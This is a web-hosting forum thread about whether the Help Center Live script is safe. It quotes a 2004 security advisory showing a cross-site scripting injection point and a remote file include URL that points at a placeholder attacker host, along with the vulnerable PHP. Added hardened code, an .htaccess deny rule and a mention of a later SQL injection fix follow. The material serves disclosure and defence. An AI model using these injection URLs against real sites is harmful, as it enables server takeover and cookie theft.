
Vodahost or Navaldesign - Fantastico



davidundalicia
02-11-2007, 09:20 PM
Hi, I have just been trying out Help Centre Live from Fantastico,
and I came across this on the web.... Has this been fixed, or should we just dump it?
I know it's an old report, but I am still wary of continuing with this product!!

Thanks...

Critical Vulnerability In Help Center Live
December 24, 2004

Vendor : Michael Bird
URL : http://www.helpcenterlive.com/
Version : All Versions
Risk : Multiple Vulnerabilities


Description:
Help Center Live is a "Live" help desk system written in PHP using a MySQL database backend that features Live Support, Trouble Tickets and FAQ within one project. This is a very popular application, especially with webhosts and other services.


Cross Site Scripting:
Cross site scripting exists in Help Center Live. This vulnerability exists due to user supplied input not being checked properly. Below is an example.

http://path/faq/index.php?find=[CODEGOESHERE]&search=Search

This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.


File Include Vulnerability:
There lies a very dangerous file include vulnerability in Help Center Live. An attacker can run system commands with the rights of the webserver by including a malicious file.

http://path/inc/pipe.php?HCL_path=http://attacker

All an attacker has to do is include any malicious PHP code and it will be executed. Here is the vulnerable code; it is located in inc/pipe.php:



// $HCL_path is never assigned in this file: with register_globals=On it is
// populated straight from ?HCL_path=, so the include base is attacker-controlled.
$decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
include($decodemessage);


Since we call the pipe.php file directly, we can now include a file as long as register_globals is turned on in the PHP configuration settings. There is a similar issue in skin.php; this could be used in some circumstances to gain access to arbitrary local files and possibly more.



// Get a default inner if no inner is specified
if (!isset($SKIN_inner)) {
    $SKIN_inner = "default";
}

// Get the skins ($HCL_path, $SKIN_name and $SKIN_type are likewise taken from
// the request when register_globals is on, so "../" sequences reach arbitrary files)
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_file = fread($handle, filesize($file));
fclose($handle);

// e.g. blah_inner_default.hcl
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_inner = fread($handle, filesize($file));
fclose($handle);



Solution:
I have contacted the developer, but received no answer. My advice would be for any users running Help Center Live to deny direct access to the /inc/ directory, as it is not needed. This can be accomplished in the Apache web server by configuring a .htaccess file to effectively "deny from all" and restrict access to the directory containing the vulnerable files.


Credits:
James Bercegay of the GulfTech Security Research Team
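The hardened counterpart of the two snippets quoted above, as an added example written for this thread and not code from Help Center Live or from GulfTech. It assumes a front controller (index.php) at the install root that pulls in the files under inc/; HCL_PATH, HCL_ENTRYPOINT, hcl_require_entrypoint(), hcl_skin_file() and hcl_escape_search() are hypothetical names. It also covers the faq/index.php?find= reflection from the same advisory.

```php
<?php
// Added example for this thread; not Help Center Live's own code. HCL_PATH,
// HCL_ENTRYPOINT, hcl_require_entrypoint(), hcl_skin_file() and
// hcl_escape_search() are hypothetical names chosen for the illustration.

// 1. The include base is a constant fixed from the front controller's own
//    location. A constant cannot be overwritten by ?HCL_path=http://attacker,
//    whether register_globals is on or off.
define('HCL_PATH', __DIR__);
define('HCL_ENTRYPOINT', true);

// 2. First line of every file under inc/: refuse to run unless pulled in by the
//    front controller, so inc/pipe.php?HCL_path=... requested over HTTP gets a
//    403 even if the .htaccess protection is missing or ignored.
function hcl_require_entrypoint(): void
{
    if (!defined('HCL_ENTRYPOINT')) {
        http_response_code(403);
        exit('Direct access denied');
    }
}

// 3. Skin components are whitelisted and the resolved path is confirmed to be
//    inside inc/skins, closing the skin.php local-file read.
function hcl_skin_file(string $name, string $type, string $inner = 'default'): ?string
{
    foreach ([$name, $type, $inner] as $part) {
        if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $part)) {
            return null;   // rejects "../", NUL bytes, URLs and empty strings
        }
    }
    $skinsDir = realpath(HCL_PATH . '/inc/skins');
    $file = realpath($skinsDir . "/{$name}/{$type}_inner_{$inner}.hcl");
    if ($skinsDir === false || $file === false
        || strpos($file, $skinsDir . DIRECTORY_SEPARATOR) !== 0) {
        return null;       // missing file, or a symlink escaped the skins tree
    }
    return $file;
}

// 4. The faq/index.php?find= reflection: encode on output, not on input.
function hcl_escape_search(string $find): string
{
    return htmlspecialchars($find, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// --- use from the front controller ---
hcl_require_entrypoint();
include HCL_PATH . '/inc/DecodeMessage.inc';   // fixed base, no request data

$find = $_GET['find'] ?? '';
echo 'Results for: ' . hcl_escape_search($find);   // <script> renders as text

$skin = hcl_skin_file($_GET['SKIN_name'] ?? 'default', 'main',
                      $_GET['SKIN_inner'] ?? 'default');
if ($skin === null) {
    http_response_code(400);
    exit('Bad skin');
}
$SKIN_output_inner = file_get_contents($skin);
```

The realpath() check matters more than the regex: a whitelisted skin name that is a symlink can still point outside inc/skins, and only the resolved path catches that. Turning register_globals off is still the real fix for the class of bug; the code above is what lets the application stay safe when that setting is not under your control on shared hosting.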

navaldesign
02-11-2007, 09:52 PM
I have only used Help Center Live approx. a year ago. At that time, issues with the PHP version and settings would not allow correct functioning of the script, so I simply abandoned it. Sorry David, I cannot answer you.

davidundalicia
02-11-2007, 10:09 PM
Thanks for your quick reply George.

It seems to work OK, but I am loath to use it if it is still a security risk.

What about the use of a htaccess file that was mentioned?
How would this be implemented ?

Thanks again.


I will await a reply from *****...
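The .htaccess the advisory recommends, as an added example for this thread (not from GulfTech or from Help Center Live): save it as inc/.htaccess under the Help Center Live install directory. It assumes the host's Apache allows AllowOverride Limit (or All) for your account; if overrides are disabled the file is silently ignored, so test it afterwards by requesting /inc/pipe.php in a browser and checking for a 403.

```apache
# Added example: <install root>/inc/.htaccess
# Blocks every direct HTTP request to the inc/ directory. The application is
# unaffected, because it pulls these files in with include() from disk, not
# over HTTP.

# Apache 2.4 and later
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>

# Apache 2.2 (what most shared hosts ran when this thread was written)
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>

# If PHP runs as an Apache module, this also removes the root cause for the
# whole site; it has no effect under CGI/FastCGI, where php.ini must be used.
# Uncomment to apply:
# php_flag register_globals off
```

Deny-from-all only closes the direct-request vector described in the advisory; the include still trusts $HCL_path, so a register_globals=Off setting (or an updated version) is what actually removes the bug.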

navaldesign
02-11-2007, 10:10 PM
Found this on the net:

Description:
Some vulnerabilities have been reported in Help Center Live, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to unspecified parameters in the "osTicket" module isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Update to version 2.1.0.
http://sourceforge.net/project/showfiles.php?group_id=93857

Since Fantastico has v. 2.1.2, I suppose it is OK.



Security Focus also seems to share the same opinion:

http://www.securityfocus.com/bid/17676